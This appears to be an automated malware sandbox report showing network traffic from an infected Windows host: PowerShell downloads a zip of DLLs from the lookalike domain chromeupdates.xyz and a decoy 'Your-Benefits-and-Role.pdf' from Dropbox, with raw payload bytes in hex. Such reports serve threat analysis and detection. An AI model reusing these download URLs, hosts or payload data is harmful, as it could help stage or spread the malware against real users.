                                                                                                                                                                                                    Nov 15, 2024 09:00:33.545850039 CET49773443192.168.2.5162.125.65.18
                                                                                                                                                                                                    Nov 15, 2024 09:00:33.545866966 CET44349773162.125.65.18192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:33.546216965 CET44349773162.125.65.18192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:33.553078890 CET49773443192.168.2.5162.125.65.18
                                                                                                                                                                                                    Nov 15, 2024 09:00:33.599340916 CET44349773162.125.65.18192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:34.641347885 CET44349773162.125.65.18192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:34.641423941 CET44349773162.125.65.18192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:34.641437054 CET49773443192.168.2.5162.125.65.18
                                                                                                                                                                                                    Nov 15, 2024 09:00:34.641472101 CET49773443192.168.2.5162.125.65.18
                                                                                                                                                                                                    Nov 15, 2024 09:00:34.648363113 CET49773443192.168.2.5162.125.65.18
                                                                                                                                                                                                    Nov 15, 2024 09:00:34.671986103 CET49784443192.168.2.5162.125.65.15
                                                                                                                                                                                                    Nov 15, 2024 09:00:34.672029018 CET44349784162.125.65.15192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:34.672101021 CET49784443192.168.2.5162.125.65.15
                                                                                                                                                                                                    Nov 15, 2024 09:00:34.672488928 CET49784443192.168.2.5162.125.65.15
                                                                                                                                                                                                    Nov 15, 2024 09:00:34.672498941 CET44349784162.125.65.15192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:35.546976089 CET44349784162.125.65.15192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:35.547051907 CET49784443192.168.2.5162.125.65.15
                                                                                                                                                                                                    Nov 15, 2024 09:00:35.547070980 CET44349784162.125.65.15192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:35.547188997 CET49784443192.168.2.5162.125.65.15
                                                                                                                                                                                                    Nov 15, 2024 09:00:35.549340963 CET49784443192.168.2.5162.125.65.15
                                                                                                                                                                                                    Nov 15, 2024 09:00:35.549349070 CET44349784162.125.65.15192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:35.549699068 CET44349784162.125.65.15192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:35.550780058 CET49784443192.168.2.5162.125.65.15
                                                                                                                                                                                                    Nov 15, 2024 09:00:35.591331959 CET44349784162.125.65.15192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:35.966455936 CET44349784162.125.65.15192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:35.966517925 CET44349784162.125.65.15192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:35.966737032 CET49784443192.168.2.5162.125.65.15
                                                                                                                                                                                                    Nov 15, 2024 09:00:35.966763973 CET44349784162.125.65.15192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:35.966816902 CET49784443192.168.2.5162.125.65.15
                                                                                                                                                                                                    Nov 15, 2024 09:00:35.967103958 CET44349784162.125.65.15192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:35.967216969 CET44349784162.125.65.15192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:35.967264891 CET49784443192.168.2.5162.125.65.15
                                                                                                                                                                                                    Nov 15, 2024 09:00:35.984462976 CET49784443192.168.2.5162.125.65.15

                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Nov 15, 2024 09:00:06.730367899 CET5809853192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 15, 2024 09:00:07.548629999 CET53580981.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:32.632239103 CET6520353192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 15, 2024 09:00:32.640836954 CET53652031.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:34.649806023 CET5288053192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 15, 2024 09:00:34.668606997 CET53528801.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:49.460987091 CET5790053192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 15, 2024 09:01:01.742117882 CET5324253192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 15, 2024 09:01:15.181741953 CET5950253192.168.2.51.1.1.1

                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                    Nov 15, 2024 09:00:06.730367899 CET192.168.2.51.1.1.10xad6fStandard query (0)chromeupdates.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 15, 2024 09:00:32.632239103 CET192.168.2.51.1.1.10xcb58Standard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 15, 2024 09:00:34.649806023 CET192.168.2.51.1.1.10x1f71Standard query (0)ucdfbc3902915a267069329ce5e2.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 15, 2024 09:00:49.460987091 CET192.168.2.51.1.1.10x4fefStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 15, 2024 09:01:01.742117882 CET192.168.2.51.1.1.10xb1f3Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 15, 2024 09:01:15.181741953 CET192.168.2.51.1.1.10x83ccStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                    Nov 15, 2024 09:00:07.548629999 CET1.1.1.1192.168.2.50xad6fNo error (0)chromeupdates.xyz202.92.4.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 15, 2024 09:00:32.640836954 CET1.1.1.1192.168.2.50xcb58No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 15, 2024 09:00:32.640836954 CET1.1.1.1192.168.2.50xcb58No error (0)www-env.dropbox-dns.com162.125.65.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 15, 2024 09:00:34.668606997 CET1.1.1.1192.168.2.50x1f71No error (0)ucdfbc3902915a267069329ce5e2.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 15, 2024 09:00:34.668606997 CET1.1.1.1192.168.2.50x1f71No error (0)edge-block-www-env.dropbox-dns.com162.125.65.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 15, 2024 09:00:49.468152046 CET1.1.1.1192.168.2.50x4fefNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 15, 2024 09:01:01.752557039 CET1.1.1.1192.168.2.50xb1f3No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 15, 2024 09:01:15.190504074 CET1.1.1.1192.168.2.50x83ccNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                    • chromeupdates.xyz
                                                                                                                                                                                                    • www.dropbox.com
                                                                                                                                                                                                    • ucdfbc3902915a267069329ce5e2.dl.dropboxusercontent.com

                                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    0192.168.2.549704202.92.4.574432804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2024-11-15 08:00:08 UTC84OUTGET /cum/synaptics.zip HTTP/1.1
                                                                                                                                                                                                    Host: chromeupdates.xyz
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    2024-11-15 08:00:09 UTC219INHTTP/1.1 200 OK
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    content-type: application/zip
                                                                                                                                                                                                    last-modified: Fri, 25 Oct 2024 11:34:00 GMT
                                                                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                                                                    content-length: 17730909
                                                                                                                                                                                                    date: Fri, 15 Nov 2024 08:00:08 GMT
                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                    2024-11-15 08:00:09 UTC1149INData Raw: 50 4b 03 04 0a 00 00 00 00 00 1b 98 2f 59 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 44 4c 4c 73 2f 50 4b 03 04 14 00 00 00 08 00 f8 75 85 56 c9 4a 5c 2a e0 f1 0d 00 18 bb 22 00 16 00 00 00 44 4c 4c 73 2f 6c 69 62 63 72 79 70 74 6f 2d 31 5f 31 2e 64 6c 6c ec bd 07 58 54 49 b4 ae dd 20 2a 0a d2 ad a2 a2 a2 a2 62 ce b6 39 27 04 15 85 31 8f 39 e7 2c e6 34 88 28 d8 62 0e 63 18 1d 73 d6 71 cc 8e 09 73 16 73 ce 09 cc 39 2b f7 7b bb c1 30 e3 9c 73 ff 73 cf 9f ee ed fd 3c 36 b5 77 55 ad 5a b5 aa 6a d5 4a 55 d6 6c 34 de 90 c0 60 30 38 e9 5f 6c ac c1 b0 c9 60 7b 2a 18 fe f3 e7 ad fe b9 65 da e2 66 58 97 e4 68 e6 4d 0e fe 47 33 d7 ed d0 b1 b7 57 8f 5e dd db f7 6a d9 d5 ab 75 cb 6e dd ba 07 79 b5 6a eb d5 ab 4f 37 af 8e dd bc aa 04 d4 f1 ea da bd 4d db fc c9 92
                                                                                                                                                                                                    Data Ascii: PK/YDLLs/PKuVJ\*"DLLs/libcrypto-1_1.dllXTI *b9'19,4(bcsqss9+{0ss<6wUZjJUl4`08_l`{*efXhMG3W^junyjO7M
                                                                                                                                                                                                    2024-11-15 08:00:09 UTC14994INData Raw: 5f 37 d5 f5 99 22 ec ff 08 52 c6 cc 92 09 84 5f 75 75 d0 21 21 f0 c6 eb 67 f1 6b 75 7a 57 65 15 a9 b9 4b ed be 2d a1 d7 3a a7 94 6a 46 a7 97 ee 61 fe 31 fa cd 8f e9 f5 a2 bb 20 4f 69 aa 0e 9a f2 29 e3 70 1a 01 3d bb 96 f5 b1 53 b9 fe dd 04 af 78 2a 15 e9 75 55 45 22 b6 aa 97 9b d2 e8 67 7e 62 01 7d fc 9b 6a a4 ad 91 40 fd 65 68 bb bb a9 d3 5b b2 aa 5a c2 36 42 bc c5 43 41 49 7f 50 dd 9a 9a 59 88 47 ee 57 e1 23 c5 54 d8 f7 84 8a a4 e8 a2 8c a6 bb 05 7e 53 21 e5 4e 02 e8 aa ea 9a 2a 9b b7 ab 9c f7 23 d5 7d c2 30 ce e8 af 54 aa f3 2a 7c 3d 46 f3 e5 41 69 a1 71 76 83 c0 3f 6b ae 6a 65 92 0a 5e 62 66 67 af f1 4a 5d 69 a5 8c 5f 99 7a bb 67 2b 77 76 88 28 d9 71 a6 aa b9 cf 50 c6 ea 31 d0 ef a4 e0 85 3e d0 cf d3 86 5a 65 2e dd 54 f8 75 66 8d ea 5c 37 41 1e 3c 40
                                                                                                                                                                                                    Data Ascii: _7"R_uu!!gkuzWeK-:jFa1 Oi)p=Sx*uUE"g~b}j@eh[Z6BCAIPYGW#T~S!N*#}0T*|=FAiqv?kje^bfgJ]i_zg+wv(qP1>Ze.Tuf\7A<@
                                                                                                                                                                                                    2024-11-15 08:00:09 UTC16384INData Raw: aa cd 62 e6 9c c3 e6 3b fc 9a 00 94 65 17 ca c9 95 24 ad b3 70 de c0 da 5f d6 65 11 ce 0c 74 e7 3c 76 d2 22 e8 33 d7 39 1f 4a 54 e7 f2 a4 9c bf 8c e1 bc 1a dc 62 f0 22 07 ee 77 44 de 28 c6 79 0d 6e ba 78 cb f5 5a 93 d0 85 6a ed 53 a7 37 d7 12 42 b7 31 f2 06 e0 d9 1b 88 a3 e0 0e 61 2e 26 22 b6 6a 0c 25 5e 34 23 f1 c0 43 f4 cd 95 9b 97 36 12 0a d7 aa 0f f1 75 d8 73 3a 74 e0 fe d3 a1 a2 e9 f6 2d ec 1f 6d 55 64 cf 04 c1 6b 4e bc 4a a9 48 21 d4 07 3e 14 55 86 f8 f1 c1 a2 50 31 ec 43 3d db 60 6f 67 e3 5b ec c2 fe 1b a5 f1 4d c6 2e 99 13 47 f8 7c cc 31 b3 9b 21 5f b1 69 06 21 1f ec 58 a8 54 27 fc 4c 45 b7 0b c9 f1 48 37 a5 d7 2b 35 35 8b be dd e0 ee 9d 59 04 01 9e db cc fa e8 a7 dc 0c 28 94 4b b0 38 9c 1a a1 9f 66 1c 6f 0f 47 ed ab 82 d2 fa 84 c9 50 0a 7e d5 16
                                                                                                                                                                                                    Data Ascii: b;e$p_et<v"39JTb"wD(ynxZjS7B1a.&"j%^4#C6us:t-mUdkNJH!>UP1C=`og[M.G|1!_i!XT'LEH7+55Y(K8foGP~
                                                                                                                                                                                                    2024-11-15 08:00:09 UTC16384INData Raw: b0 45 95 e1 7a e8 f7 ff 00 d6 68 25 90 f0 eb 02 74 52 d8 4f dc 9e 1c be 46 8e 9d a2 96 e3 51 2e 2d 58 90 e6 9f e0 66 af f1 1c 16 04 fc 0b 53 ce ec 2e 43 1a 97 50 9f fc 59 5c d3 ae 97 99 2f 93 24 2a 61 33 ca 54 30 6a d6 34 af d5 7f 5d 45 50 33 36 84 29 62 5c bd 23 0f 88 91 f6 b2 ee b2 74 9d ef 12 81 79 7a a3 f7 75 70 02 b6 0b b5 a4 73 eb d8 6a 60 2c 7d d7 e8 73 99 53 c3 2e 19 af 69 be 6b f5 84 a2 5a 36 7d 3c 4d 6e 7e 70 93 83 26 37 2b ea 2b a3 6c 22 21 b1 3f f8 8a f9 d3 03 f8 74 b7 ef 32 7a f2 e0 e1 95 dd 77 88 18 35 77 2d 49 4f fe 00 0c 99 af 3a 81 ee 28 27 cb 63 cb 0e 11 ba c3 31 16 65 a2 76 14 aa 3c 49 bb 84 d2 fc 90 81 4e c4 39 18 f3 d0 8d 9d 6a 10 be a5 33 eb d8 7b ff 8c a3 97 7a 1e ad 03 ff 15 9e 9a 3a 66 fb a7 7e 18 b8 98 2e 57 a0 15 03 33 7a 11 c9
                                                                                                                                                                                                    Data Ascii: Ezh%tROFQ.-XfS.CPY\/$*a3T0j4]EP36)b\#tyzupsj`,}sS.ikZ6}<Mn~p&7++l"!?t2zw5w-IO:('c1ev<IN9j3{z:f~.W3z
                                                                                                                                                                                                    2024-11-15 08:00:09 UTC16384INData Raw: e2 51 8e cb fd b3 54 5c 6e 74 fb c8 02 84 ed 45 47 6e e7 fc 02 17 30 ba cb 15 1b 93 70 4b 70 88 b4 55 6b e1 36 b5 85 23 63 a9 05 55 f2 33 09 49 30 7b 66 1c 1e 46 8b ee e1 22 c4 c6 f2 85 5f f2 0a 25 dd aa 31 fa 14 f9 e8 9d 88 62 68 c1 45 d2 4b 76 f5 e4 b8 8c 74 58 37 19 a9 73 6c 9c 37 6f 24 b9 a3 99 fd 79 6d 5c 4a ba 93 e8 ba c9 c7 7a 8d e3 32 aa 67 d6 26 48 48 cb cb 14 1b d9 04 57 4d 99 ec ae dc f8 ba fe 87 6c d9 d0 5e 8b 7c 20 78 7d e8 b4 a5 af 7c 30 1e bd 70 34 de 50 33 a1 57 84 fe 38 e8 1a af 6e d9 36 cd 7e bd a6 20 c5 de b0 ae 40 f1 2e 92 22 7d 02 7b 93 5b 75 f4 31 96 87 8d cf 4b 71 a9 39 43 fd 29 90 4c 6d a2 72 3c 17 1d f5 c3 89 01 bb 4d 77 8a 1a 2f dd ff 9f cf 16 43 fa 42 e7 8b 19 a9 0a e4 5d ac a6 32 41 8f 5d 2d 7a e5 ce 50 73 60 a0 58 d7 e0 62 67
                                                                                                                                                                                                    Data Ascii: QT\ntEGn0pKpUk6#cU3I0{fF"_%1bhEKvtX7sl7o$ym\Jz2g&HHWMl^| x}|0p4P3W8n6~ @."}{[u1Kq9C)Lmr<Mw/CB]2A]-zPs`Xbg
                                                                                                                                                                                                    2024-11-15 08:00:09 UTC16384INData Raw: b1 85 27 96 5c 8d cb ca 7c 7c 12 3b 45 c6 57 0b ac d6 ad 88 6d a8 48 30 fb f2 49 1e 26 61 03 16 b1 04 18 cb 50 77 c4 49 51 14 39 45 60 c2 06 f8 ca a9 ed 8e 27 e9 95 4c 54 76 63 fb a9 8e a2 58 a6 d2 8e 76 53 0c 89 00 04 bd 30 7c 22 21 cf 83 0e fd 11 a3 e4 f8 ca 01 3d 4d d8 4f 62 cc 4d e1 37 54 1f 17 95 a1 2c 08 c0 c5 21 fc e2 0c 8e fa 71 3c 94 2f 60 2f aa 7f dd 01 6e 5e 9a 76 0a 85 e2 1c d5 45 d3 cf b2 3b 35 de b0 87 9f 59 3a 35 7a 50 a4 d5 0a 06 49 fd 58 14 27 93 57 b7 f2 d0 0c 05 0d 01 56 ce 5d 51 51 4f 82 e5 6e 35 e4 53 14 f5 f1 92 00 87 70 c1 a1 8e 84 70 56 11 3c 60 16 ce e4 ad 7e 9f 9a 82 a8 c0 cb 42 fb d2 01 a6 db 03 af fb 0d f7 25 25 30 85 da 3b 61 f6 bd 6c d6 d7 d4 ba 18 eb 26 a8 d0 f5 3a e2 f7 71 a1 df 1d 60 cd 3b a9 cf 0f ad ca 31 c5 eb 03 e5 f7
                                                                                                                                                                                                    Data Ascii: '\||;EWmH0I&aPwIQ9E`'LTvcXvS0|"!=MObM7T,!q</`/n^vE;5Y:5zPIX'WV]QQOn5SppV<`~B%%0;al&:q`;1
                                                                                                                                                                                                    2024-11-15 08:00:09 UTC16384INData Raw: 75 22 95 52 63 f5 0b 70 7d 44 6e 66 bf bf 9d 8f 61 eb 0f fd e1 f9 42 5e 03 35 ce ab 08 88 51 20 6e ad c6 96 aa 2d b5 bf 8a e9 c9 42 ef a4 ce e9 b0 f3 d5 ba 11 46 6a c4 14 1c 6c f8 74 f2 82 94 c2 6f 72 bf 3e b3 87 d2 f9 e3 c6 7d 11 a5 d7 d1 46 d3 20 c0 22 f2 51 0f 85 07 df 6c 26 0c f5 d0 ce ec 11 7b ea c6 c6 1e ab e4 37 ec 9d 89 3c f6 a0 2d d4 a9 f9 87 a6 64 a8 5e ff cb 24 95 f2 b2 ad ed 49 dd b7 ca 0a 9a 38 f9 89 9b a1 ad 98 69 8e 5d 01 45 55 fe 2c 85 ec e8 64 b0 17 b1 fc 78 da 23 27 fb 23 e1 38 ac f5 79 ca 90 16 8d fe 7f 8f fc 64 24 74 de 67 1c 65 29 d3 d8 69 37 77 22 cd 2d 6b ae 47 ce 61 8c 60 16 3a 8f 51 13 df 7c 40 1f 3f 6e 6c a1 ce 95 3f c4 fb da 91 e5 2f 56 06 73 f4 7c 5c 51 00 3d 3f b8 82 43 62 a7 52 97 c9 c9 c0 ac c6 0d c8 16 7e fe c1 ca 9e b8 cc
                                                                                                                                                                                                    Data Ascii: u"Rcp}DnfaB^5Q n-BFjltor>}F "Ql&{7<-d^$I8i]EU,dx#'#8yd$tge)i7w"-kGa`:Q|@?nl?/Vs|\Q=?CbR~
                                                                                                                                                                                                    2024-11-15 08:00:09 UTC16384INData Raw: b3 c8 c4 61 0b c1 26 9c 69 41 d8 44 c2 16 84 2d 75 e9 64 1f 2e 1d 08 01 d1 08 0d ff d0 1f 0a bc 68 a7 c5 fe c1 b6 4a 4b 03 1c 69 25 52 e4 f2 4b 04 49 91 82 a4 f5 37 3f 22 4a a4 2c ea cb 12 7b 7e e7 9c 3b 33 a4 66 d7 5e 27 35 10 40 03 ec 6a e6 71 e6 bd 77 ee 3d 1f bf f3 3b e7 de 97 bd b4 9f cb 4d d1 e7 53 fa df a1 43 35 e4 7e 3e 55 83 c6 f7 9a 2a f7 77 a9 6f f7 c0 fe 7d ae 9b 11 75 c8 03 cb f1 ca ab dc ba fe ac 62 95 db ef be bb af e0 73 f6 0f 3f 41 c1 c7 d5 bb 7e bb ca 75 df 3a b0 06 70 f3 bf 54 5c 74 e3 db fb 2a 5e 47 ff f0 17 ad 78 7d 82 fa 97 ae fa c3 57 0e 0e c8 e7 2a ef ed d4 b7 f7 0d 48 cf 37 7f fe 01 c1 fc be 3d f6 52 68 d1 27 5f ae fb a3 73 12 70 6f fe 1f 9e ea 51 fa 87 46 eb 1f 1d ac 4c 7f ee 8f ab 54 a6 01 b5 ec 91 e8 14 9e 28 16 8b 4e d5 eb 23
                                                                                                                                                                                                    Data Ascii: a&iAD-ud.hJKi%RKI7?"J,{~;3f^'5@jqw=;MSC5~>U*wo}ubs?A~u:pT\t*^Gx}W*H7=Rh'_spoQFLT(N#
                                                                                                                                                                                                    2024-11-15 08:00:09 UTC16384INData Raw: 6d a0 a8 27 57 5c f6 92 cf ba df 53 95 fc dd c2 59 ec 2a 7f 17 ed 13 be b3 3b a8 99 ff da 0a aa d9 fc 55 b4 72 5c 45 fb f9 8f 7f 03 fb 41 09 4d 0a 05 b5 58 15 08 c8 78 08 c3 12 fc 43 65 d7 d9 04 6b 54 95 1b 85 73 11 14 fe 14 bf 5a 18 8b 28 e3 ce 1a 95 35 c6 f0 8e 69 ca 8d 3c 0b fc 65 c7 c1 1f 97 9f f7 ce 2b 13 d9 89 e5 03 40 c1 1b 67 d7 e9 b2 07 97 dd 03 51 16 c1 4b f1 da 19 50 91 fb fd a8 82 45 3e 50 32 fc 15 49 c7 6b 47 9d 35 31 b6 14 b4 05 74 1b 54 aa cb 98 c0 7b d3 cb b2 93 40 f2 a5 58 39 49 65 32 3b 09 04 59 2e e6 bd a4 ba db a3 ec 0c 5d 1d 41 7d e5 34 7e 15 1f 45 27 bc 67 94 3e 76 93 56 36 30 82 57 31 63 bc 43 43 61 41 3b ef 65 55 08 72 cf fd cb 28 dc bb 0a e3 6a 72 b1 78 ed 15 4a 0e 3c b9 48 ef 20 b0 60 c0 7b 49 0b 2b e8 b2 b3 46 c7 86 c4 97 86 7c
                                                                                                                                                                                                    Data Ascii: m'W\SY*;Ur\EAMXxCekTsZ(5i<e+@gQKPE>P2IkG51tT{@X9Ie2;Y.]A}4~E'g>vV60W1cCCaA;eUr(jrxJ<H `{I+F|
                                                                                                                                                                                                    2024-11-15 08:00:09 UTC241INData Raw: b3 cb 6b 01 49 d2 ee f2 02 15 71 6d 88 42 c2 64 0b 48 ba 76 94 76 6b e6 46 27 4b 5f 63 bf da c8 ff 75 be 7a be ed 03 a0 75 1d e2 53 c7 68 b0 76 59 fd d8 ba 62 c4 3e 46 9e 73 ad 6e 28 1f ca 54 2a 4b 14 cf 39 9d 4b d5 d8 a9 b5 2d 65 06 43 8d 30 46 61 9b d0 a6 d2 16 c7 83 7c a5 22 89 ca f4 bb 51 ed c9 5e 22 ec e8 dd f9 1e af 46 1b f3 cd a2 09 f5 7e 07 46 02 b7 4f 74 ca 4d e8 6c 7a e2 4d 92 dc 94 89 cc 00 6f 07 cc 51 8f 9b 3f bb 98 3a e2 21 cf be f7 d5 aa d2 8e de 97 49 9d 1f d0 71 b6 62 bb 94 f4 cf 56 06 a0 1e 42 00 ce dd 53 81 5a 93 c8 de d0 10 77 03 6a 56 c3 64 31 93 28 72 35 77 c7 8d c1 6f b1 78 64 5f 30 cb b9 01 33 17 65 aa 2f 75 1c c9 8d b3 ed 3d af ba 63 8d 2b dc 2d cb ef 78 c4 18 5c e2 dc 13 34 bb 5f 0b 4a ee
                                                                                                                                                                                                    Data Ascii: kIqmBdHvvkF'K_cuzuShvYb>Fsn(T*K9K-eC0Fa|"Q^"F~FOtMlzMoQ?:!IqbVBSZwjVd1(r5woxd_03e/u=c+-x\4_J


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    1192.168.2.549773162.125.65.184432804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2024-11-15 08:00:33 UTC264OUTGET /scl/fi/evu7c2vgbewx58xom0qaa/Your-Benefits-and-Role.pdf?rlkey=qa56drncavprj5y2nd7i1bgzq&st=so1oyzsc&dl=1 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                    Host: www.dropbox.com
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    2024-11-15 08:00:34 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                    Content-Security-Policy: base-uri 'self' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; media-src https://* blob: ; font-src https://* data: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox. [TRUNCATED]
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Location: https://ucdfbc3902915a267069329ce5e2.dl.dropboxusercontent.com/cd/0/get/CeYLvLikFX2y1znhZcHxMXpDXU5aAQInOsXU4TA40PP2Sf-qOX27-quRdcM9Ax9TtVD7MpkWib9sRqMTEbIddVFGx8phIMYrloP34nB0EL2ZJiBMERO2oidCUxkUhSv6rO64KXLDE72pmtnSapDuuvb3/file?dl=1#
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                    Set-Cookie: gvc=MTY1NTIxNTQzMjkzMDk5MzIzNjY3NDg2MDM5NDYxNjQzNzMyMDAy; Path=/; Expires=Wed, 14 Nov 2029 08:00:33 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                    Set-Cookie: t=DTSgd5Wg9vDaezziuUw3COsH; Path=/; Domain=dropbox.com; Expires=Sat, 15 Nov 2025 08:00:33 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                    Set-Cookie: __Host-js_csrf=DTSgd5Wg9vDaezziuUw3COsH; Path=/; Expires=Sat, 15 Nov 2025 08:00:33 GMT; Secure; SameSite=None
                                                                                                                                                                                                    Set-Cookie: __Host-ss=DrePX4LBZA; Path=/; Expires=Sat, 15 Nov 2025 08:00:33 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                    Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Wed, 14 Nov 2029 08:00:33 GMT
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                    X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                    X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                    Content-Length: 17
                                                                                                                                                                                                    Date: Fri, 15 Nov 2024 08:00:34 GMT
                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                    Server: envoy
                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                    X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                    X-Dropbox-Request-Id: 99cd5d6496244d9682e10828be0ebba2
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    2024-11-15 08:00:34 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                    Data Ascii: ...status=302-->


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    2192.168.2.549784162.125.65.154432804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2024-11-15 08:00:35 UTC370OUTGET /cd/0/get/CeYLvLikFX2y1znhZcHxMXpDXU5aAQInOsXU4TA40PP2Sf-qOX27-quRdcM9Ax9TtVD7MpkWib9sRqMTEbIddVFGx8phIMYrloP34nB0EL2ZJiBMERO2oidCUxkUhSv6rO64KXLDE72pmtnSapDuuvb3/file?dl=1 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                    Host: ucdfbc3902915a267069329ce5e2.dl.dropboxusercontent.com
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    2024-11-15 08:00:35 UTC772INHTTP/1.1 200 OK
                                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Cache-Control: max-age=60
